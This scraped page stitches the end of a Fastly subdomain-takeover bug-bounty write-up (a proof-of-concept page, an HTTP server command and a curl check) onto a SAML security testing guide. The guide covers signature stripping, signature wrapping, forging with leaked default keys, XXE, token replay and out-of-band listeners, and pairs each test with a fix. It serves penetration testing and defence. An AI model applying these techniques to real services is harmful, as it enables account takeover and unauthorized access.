<!DOCTYPE html>

<html>
    <head><title>STO PoC</title></head>
    <body>
        <h1>ValluvarSploit PoC</h1>
    </body>
</html>
python3 -m http.server 80
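Once the dangling subdomain has been claimed in the Fastly dashboard and pointed at the host serving this page, the takeover can be confirmed from any machine; a minimal check, assuming the vulnerable subdomain is next.redacted.com as above:

# The proof-of-concept page should now be served under the victim's subdomain
curl -s https://next.redacted.com/ | grep "ValluvarSploit PoC"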
The remaining steps in the original write-up cover the VPS configuration, the proof of concept, monitoring the server logs, and the $2,000 reward.

Originally posted at: https://infosecwriteups.com/fastly-subdomain-takeover-2000-217bb180730f

AppSec Tales X | SAML

by Karol Mazurek


Application Security Testing guidelines for the SAML protocol.

The article describes Application Security Testing of SAML. The advice is based on the author's own study and the referenced sources.

Constantly update the tools.

Upgrade Burp Suite with SAML-specific extensions; SAML Raider and EsPReSSO are used throughout this article.

Common SAML endpoints to look for:

/saml
/saml2
/saml/login
/saml2/login
/saml/auth
/saml2/auth
/saml/init
/saml2/init
/saml/consume
/saml2/consume
/simplesaml/module.php/core/loginuserpass.php
/simplesaml/saml2/idp

Common SAML parameters:

AuthState
SAMLRequest
authenticity_token
SAMLResponse
RelayState
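When one of the parameters listed above is found, it usually carries Base64-encoded XML. A minimal sketch for inspecting a POST-binding SAMLResponse, assuming the (URL-decoded) value has been stored in a shell variable; note that Redirect-binding SAMLRequest values are additionally DEFLATE-compressed, so a plain Base64 decode will not work for them:

# Decode the Base64 SAMLResponse and pretty-print the XML (xmllint ships with libxml2)
echo "$SAML_RESPONSE" | base64 -d | xmllint --format -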

Modify the SAML response.

  • The attackers can forge the ID data in the SAML response at will.
Source: Own study — Testing SAML Unverified Signature.
Source: Own study — Example request with a SAML Response Token viewed in the EsPReSSO extension.
Source: Own study — Testing Unverified Signature, by changing the ID data inside a SAML Response Token.

Implement signature validation.

Modify the SAML response & remove the Signature.

  • The attacker can remove the content of the signature tag or delete the whole signature to bypass the security measure.
Source: Own study — Two methods for testing SAML Signature Stripping.
Source: Own study — Testing Signature Stripping using SAML Raider.
Source: Own study — The example content of the Signature to remove.

Implement signature validation.
Always verify the signature, even if the signature value is empty.

Check if you can guess the signature.

  • The attacker can forge a signature if the signing mechanism is weak or predictable.
  • In the below example, the attacker could forge an assertion and obtain a valid session as an admin@afine.com user.
Source: Own study — Testing predictable signing mechanism.

Ensure all SAML elements in the chain use a strong, unpredictable signing mechanism.
Consider deprecating support for weak or legacy signature algorithms.

Search the internet to find the secret key for the certificate in use.

  • The attacker can forge messages if he knows the secret.
Source: Own study — Testing for the default key pair.
Source: Own study — Example of a X.509 certificate.
Source: Own study — How to copy the certificate in PEM format to the clipboard.
Source: Own study — Example fingerprinting using openssl.
  • It is handy to define a small shell function for fingerprinting X.509 certificates:
function fingerprint_x509() {
        openssl x509 -in "$1" -noout -fingerprint
}
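For example, with the function loaded and the IdP certificate saved locally (idp_cert.pem is a hypothetical filename), the resulting fingerprint can be pasted into a search engine or code search:

# Prints the certificate fingerprint (SHA-1 by default in OpenSSL)
fingerprint_x509 idp_cert.pem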
Source: Own study — Example of a Google Dorking using the exact fingerprint value.
Source: Own study — Example searching for the certificate in the cloned code repository.
Source: Own study — How to get the first 64 chars of the certificate using Python Interpreter.
Source: Own study — Example of a default private key in the code repository.
Source: Own study — Re-signing the forged SAML with an imported private key.
Source: Own study — Importing private key to the SAML Raider Certificates.
Source: Own study — Solution for the imported certificate not showing up.

Do not use the default key pair in the production environment.
Always generate a new key pair and store the secret in a secure way.
Do not disclose the secret publicly.

Inject a self-signed certificate and sign the assertion using it (see the sketch after this item).

  • The attacker can forge messages using self-signed certificates.
Source: Own study — Testing flow for the certificate replacement attack.
Source: Own study — Resigning the Assertion using a self-signed certificate.

Service Provider should verify that a trusted Identity Provider signed the SAML.
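A throwaway key pair for the self-signed certificate test above can be generated with OpenSSL and then imported into SAML Raider as shown in the screenshots; a minimal sketch (file names and subject are arbitrary):

# Generate a disposable self-signed certificate and private key for re-signing the assertion
openssl req -x509 -newkey rsa:2048 -keyout selfsigned.key -out selfsigned.crt -days 1 -nodes -subj "/CN=saml-test"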

Test for all eight XSW attacks using SAML Raider.

  • The attacker can inject arbitrary content.
Source: Own study — Testing the XML Signature Wrapping attacks.
Source: Own study — Testing XSW1 attack using SAML Raider extension.
Source: Own study — Mindmap, briefly explains all eight XML Signature Wrapping attacks.

Validate the signature according to the .

Swap the ServiceURL during login from SP1 to SP2.

  • The attacker can get access to the forbidden service provider.
  • For example, there are two applications (admin panel and sales).
  • The attacker has access only to the sales page using normal SAML flow.
  • Using the TRC technique, the attacker can change the ServiceURL to an admin panel during login to the sales application.
Source: Own study — Testing the TRC.
Source: Own study — The example login flow with the changed ServiceURL within the SAMLRequest parameter.
Source: Own study — The decoded value of a SAMLRequest parameter with changed ServiceURL value.

Service Provider should always validate the recipient value.

Register the account with the comment and use the SSO.

  • The attacker can hijack other users' accounts.
Source: Own study — Testing for comment injection vulnerability.

The detailed testing of the registration process was described in:

Register a similar account and use a comment to strip part of it.

  • The attacker can hijack other users’ accounts.
Source: Own study — Testing for comment injection vulnerability.

Use the .

Test for the XXE injection.

  • Depending on the flaw found, the attacker could exploit directory listing, file reading, server-side request forgery (SSRF), or denial of service (DoS).
Source: Own study — Testing for the XXE vulnerabilities.
<?xml version="1.0" encoding="UTF-8"?>
Source: Own study — Using the SAML tab to generate the XML code for testing the XXE.

Ensure that all SAML providers/consumers do proper .
Disable DTD processing.

Test for the XSLT injection.

  • Depending on the flaw found, the attacker could exploit directory listing, file reading, server-side request forgery (SSRF), or denial of service (DoS).
Source: Own study — Testing for the XSLT vulnerability.
Source: Own study — Using the SAML tab to generate the XML code for testing the XXE.

Ensure that all SAML providers/consumers do proper .

Check if data is transferred via HTTP or as a parameter in the URL.

  • Sensitive data may be logged by the browser, the web server, and forward or reverse proxy servers between the two endpoints.
  • It could also be displayed on-screen, bookmarked, or emailed around by users.
  • When any off-site links are followed, they may be disclosed to third parties via the Referer header.
Source: Own study — Example of the sensitive data transmitted in the path using HTTP.

Use a secure Hypertext Transfer Protocol (HTTPS).
Use an alternative mechanism for transmitting session tokens, such as HTTP cookies or .

Register twice: once using SSO and once with an email & password.

  • The attacker could hijack an account that the user created with OAuth.
  • The attacker could set a trap by registering an account using the victim’s email and waiting for the victim to log in using the OAuth method.
Source: Own study — Testing .

Email validation should be implemented.

Check if the validation window is longer than 5 minutes (see the sketch after this item).

  • The attacker could reuse the SAML Response Token.
Source: Own study — Testing Overlong Expiration Time on the SAML Response Token.

The SAML Response Token should be rejected after 5 minutes.
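The expiration window can be read straight from the decoded response; a minimal sketch, assuming the decoded XML was saved to response.xml (a hypothetical filename):

# NotBefore / NotOnOrAfter bound the validity window of the assertion
grep -o 'NotBefore="[^"]*"\|NotOnOrAfter="[^"]*"' response.xml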

Check if you can use the same SAML Response Token twice.

  • The attacker could reuse the SAML Response Token.
Source: Own study — Testing Reusable SAML Response Token.

Each SAML Response Token should be single-use only.

Exchange one SAML Response Token for many session tokens.

  • A malicious application could persistently maintain access to users even after being deauthorized.
  • Creating fake followers, likes, and subscribers.
  • Money losses in the case of single-use coupon codes.
Source: Own study — Testing the race condition in SAML flow.

Only one session ID (SID) should be granted in exchange for a single SAML Response Token.

Conduct the input validation testing in all SAML fields.

  • The impact depends on the type of vulnerability detected.
 - comprehensive wordlist for fuzzing.

Some payloads send ICMP packets or TCP packets to port 80 when they are triggered, indicating a potential vulnerability.

You need to start two listeners on your VPS to make them work:

Source: Own study — Starting the ICMP sniffer.
Source: Own study — Starting the HTTP server on port 80.
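A minimal sketch of the two listeners the captions above refer to, assuming a Linux VPS with tcpdump and Python 3 available (the exact commands in the original screenshots may differ):

# Listener 1: watch for ICMP packets triggered by out-of-band payloads (run as root)
tcpdump -ni any icmp

# Listener 2: catch HTTP callbacks on port 80
python3 -m http.server 80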

Check the SAML Security Cheat Sheet from OWASP.

The SAML protocol is not easy to implement, so ensure you do it properly.
I am sure that my article and the below references will help you do so: